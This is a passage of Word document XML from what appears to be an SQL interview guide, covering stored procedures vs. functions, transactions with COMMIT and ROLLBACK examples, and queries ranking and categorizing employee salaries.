      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="0A1D2AE2" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4758281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vocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0675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statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EC797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be used in SQL queries (SELECT, WHERE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="6D03DD1F" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C02DF4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ide Effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353C12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odify data (INSERT, UPDATE, DELETE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C95770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hould not modify data (side-effect free)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="2F49FE71" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4846D4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60434A8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anage transactions (COMMIT, ROLLBACK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108DE9A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not manage transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="3B5F7164" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B30D2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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="240CF57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dvanced error handling with exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20320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ic error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="75D03906" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="578DD9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arameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D82B3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IN, OUT, and INOUT parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFF78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only IN parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="4AF71A87" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50289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0FD6F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lex business logic, data manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="559833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imple calculations, data retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04C1792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0D52557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when you need to encapsulate complex logic, modify the database state, or handle multiple queries within a single unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA49C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when you need to calculate or retrieve values based on inputs and want to use them in SQL queries (e.g., SELECT or WHERE clauses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6AA6AF" w14:textId="3060C32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3281" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BFFE1" w14:textId="51F6069F" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="803" w:name="_Toc197868017"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Transaction in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="803"/>
    </w:p>
    <w:p w14:paraId="490E3FCF" w14:textId="005A43F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refers to a sequence of one or more SQL operations that are executed as a single unit. Transactions ensure the </w:t>
      </w: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 xml:space="preserve"> (Atomicity, Consistency, Isolation, Durability) are maintained, which guarantees the reliability and integrity of the database, even in the case of system failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B2BF7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oncepts of SQL Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E690FB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C387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Atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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nsistency</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the database moves from one valid state to another. After the transaction, the database must be consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A247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Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the operations of a transaction are isolated from other transactions. Intermediate states of the transaction are not visible to other transactions until the transaction is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3295CD3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Durability</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that once a transaction is committed, its changes are permanent, even if there is a system failure afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED69C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 Statements</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FED7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or START TRANSACTION in some systems): Marks the beginning of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30946654"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MMIT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Finalizes the transaction. All changes made during the transaction are permanently saved to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4826613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LLBACK</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reverts all changes made during the transaction. It is used in case of errors or failures to ensure the database remains in a consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C0D0B"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SAVEPOINT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A point within a transaction where you can roll back to a specific part of the transaction without affecting the entire transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D09DA"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of SQL Transaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AFEC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tart a transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310D17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674018A5" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FE532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57C7BCA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249D3E3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ohn Doe', 50000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67AA61" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0700172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SalaryHistory table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29849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SalaryHistory (emp_id, salary, date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F147DE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50000, '2025-04-20');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F4F47" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2201256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Commit the transaction to save changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21045BE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OMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F474A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D00C0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starts the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DFF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SQL INSERT statements are part of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DBF0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both INSERT operations are successful, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>COMMIT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes the changes permanent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375D0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any of the operations fails, a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can be performed to undo any changes made within the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DBD64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Rollback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B9448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0B85DE5C" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B02C9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66AA728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33F91D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ane Doe', 60000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8043F" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF7DD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imulate an error (e.g., insert into a table that doesn't exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8E2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NonExistentTable (column1) VALUES ('value');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495424A2" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0E27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f there's an error, rollback the entire transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060892F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ROLLBACK;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FBF85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Here, if the second INSERT fails (because NonExistentTable does not exist), the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ensures that no changes (including the first insert) are made to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71C6F8"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for Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EACA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anking Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure that funds are deducted from one account and added to another atomically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6833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Processing Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure that orders are processed in a consistent manner (e.g., items are reserved and payments are processed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D620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To guarantee that a series of related updates are performed as one logical unit, without the risk of inconsistent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6E29D"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6077E0" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="00CE4B95" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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3282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E12876" w14:textId="2E4AB43A" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="002E5BA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="804" w:name="_Toc197868018"/>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00AB298B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>uery</w:t>
      </w:r>
      <w:r w:rsidR="002E5BA0"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Consider 2 tables, find out 3 employees who are earning the highest salary in each department?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="804"/>
    </w:p>
    <w:p w14:paraId="13DA398C"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Employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE5AF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mployee_id (primary key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E53BA66"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first_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22B5A4"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last_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F4593"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id (foreign key to departments.id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CC895"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alary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7CE1A"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Hire_date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA8A58"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Departments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA361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d (primary key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B8B92" w14:textId="3CF9442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name?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647BE63B" w14:textId="6B38AB77"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an SQL query that selects the 3 highest-earning employees in each department:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF3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Employees AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C680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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1C03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employee_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B955C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first_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411CBB7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ast_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064F931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department_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB170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salary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E2A9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hire_date,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF41F7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department_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726919A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OW_NUMBER() OVER (PARTITION BY e.department_id ORDER BY e.salary DESC) AS row_num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A50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 e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACB1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JOIN Departments d ON e.department_id = d.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772BD5B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67B375F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6AC1A1D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ployee_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B249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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2667095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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD7A8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partment_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2BB4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03C66C2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hire_date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2FE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Employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF8925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_num &lt;= 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1284D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epartment_id, row_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F349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612B6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ITH RankedEmployees AS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This creates a Common Table Expression (CTE) called RankedEmployees. It assigns a row number to each employee based on their salary within each department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD93C3"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W_NUMBER() OVER (PARTITION BY e.department_id ORDER BY e.salary DESC)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In the outer query, we filter out the top 3 employees from each department by selecting rows where row_num &lt;= 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318A62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BY</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We order the result by department_id and row_num to list employees by department and ensure that the top 3 employees for each department are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB00C2"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p w14:paraId="7248DD1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The query will return the top 3 highest-earning employees in each department along with their employee details, sorted by department and salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B493BDD" w14:textId="5D2E5D6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3283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFB05D" w14:textId="65E681CA" w:rsidR="00AB298B" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="805" w:name="_Toc197868019"/>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2E5BA0"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that categorizes employees based on their salary into different percentage ranges.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="805"/>
    </w:p>
    <w:p w14:paraId="52ADCDB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emp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B95E3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ary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12602612"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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA13C1C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BC12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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E04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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7435A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B1D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40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F19071"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F074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 Percentage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000732E5"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 greater than 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38379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 greater than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB9386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 greater than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5B6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40 less than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C312D8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10 less than 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC9A50"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5 less than 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8DC1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cate--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0FF68E"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90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257299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50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C1DC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less than 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52C2A9" w14:textId="26BF5CD9" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB298B" w:rsidP="00AB298B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>less than 10</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48E681" w14:textId="57AFD0C9" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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categorize employees based on their salary into different percentage ranges, you can use a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement in SQL. This allows you to create conditional logic to categorize the employees into different salary ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BFDA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hat categorizes employees based on the specified salary ranges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691DE47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3AD19F3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d, </w:t>
      </w:r>
